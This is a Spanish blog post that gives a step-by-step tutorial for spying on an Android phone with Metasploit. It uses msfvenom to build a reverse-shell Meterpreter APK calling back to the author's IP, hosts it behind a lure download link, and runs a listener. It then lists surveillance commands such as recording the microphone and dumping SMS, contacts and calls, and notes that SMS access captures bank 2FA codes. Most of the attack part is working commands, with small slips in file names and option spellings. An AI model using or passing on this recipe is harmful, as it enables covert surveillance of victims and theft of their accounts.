viernes, 1 de julio de 2022

Espiando en Android con Metasploit

Le contaba a un amigo hace unos días cómo era que quizás IOS no era más seguro que Android, y se me ocurrio una idea, mostrarle lo facil que podia ser espiar una terminal Android, pero con un poco de realismo, con un ataque de Ingenieria Social.

Quizás no sea novedad hablar del Meterpreter, un Payload de uno de los Frameworks más utilizados en la ciberseguridad, Metasploit en su version 6.2.1, en la cúal han integrado cosas muy interesantes, de las cuales tal vez hablemos en otros post.

Metaploit me ha gustado desde siempre, por eso decidi usarlo para esta demo, a pesar de que podemos descargarnos un APK de una aplicación legitima y inyectar el Meterpreter lo que haría un entorno más realista, nos fuimos un poco por el lado facil y decidi usar la utilidad msfvenom para generar un APK con el Payload:

$ msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.11 LPORT=69 R > payload/payload.pak


Con -p indicamos que vamos a generar un Payload, luego indicamos que tipo de Meterpreter vamos a usar android/meterpreter/reverse_tcp, este Meterpreter genera una Shell reversa, es decir, luego que esta instalada se conecta a nosotros mediante el protocolo TCP, por eso los siguientes parametros que le pasamos son el LHORT, que es la IP a la que se va a conectar, osea nuestra IP y LPORT, el puerto por el que se va a conectar, elegimos el 69, luego de eso le indicamos donde lo va a guardar y el nombre del archivo con R >, importante que lo guardemos con extension .apk, de otra forma no lo podremos instalar en Android.

Lo suyo seria hacer ahora una DNSSpoofing, que lo conseguiriamos luego de hacer un ARPSpoofing cómo explico en un post anterior.

Copiamos nuestro Payload en la carpeta raiz de Apache

$ cp payload/payload.apk /var/www/html/

 


Toquetiamos un poco el archivo index.html que se encuentra en la ruta donde copiamos el payload, para agregar un enlace para descargar el Meterpreter:


Ahora vamos a habilitar nuestro servidor web Apache2:

$ systemctl start apache2.service

$ systemctl status apache2.service

Y si ingresamos al Localhost desde un navegador deberiamos ver el link:


Ahora ejecutamos Metaploit y configuramos algunas cosas:

$ msfconsole

$ use multi/handler

$ set PAYLOAD android/meterpreter/reverse_tcp

Con use multi/handler indicamos que vamos a utlizar un Payload sin exploit algo así cómo un ataque pasivo, y luego indicamos el tipo de Payload que vamos a utilizar set PAYLOAD android/meterpreter/reverse_tcp, luego de esto veremos que opciones tenemos que configurar:

$ show options

 

Y configuramos los parametros LHOST y LPORT con los configurados en el Payload, luego de eso solo seria iniciar el ataque:

$ set lhort 192.168.1.11

$ set lport 69

$ exploit


Ahora debemos descargar el Payload e instalarlo en la terminal Android victima, luego de iniciarlo y haberle dado los permisos necesarios, se nos habilitara una sesión en la terminal:

Ya estamos en el sistema, ahora dentro de las posibilidades que tenemos podemos:

Grabar con el microfono:

$ record_mic -d


Ver las aplicaciones instaladas:

$ app_list


Entre muchas otras funcionalidades como hacer un Dump a los sms, a los contactos, y incluso a las llamadas, esto sería una gran falla de seguridad si suponemos que tu banco te manda un 2FA, factor de segunda autentificación como podría ser un codigo que suelen mandar por sms, pues tendriamos acceso a el, y con un MITM podemos capturar las credenciales de acceso. 

// Hasta ahí nuestra privacidad.



No hay comentarios:

Publicar un comentario

Guillermo

Confusión de dependencia: cómo pirateé Apple, Microsoft y PayPal.

La historia de un nuevo ataque a la cadena de suministros.    Desde que comencé a aprender a codificar, me ha fascinado el nivel de confianz...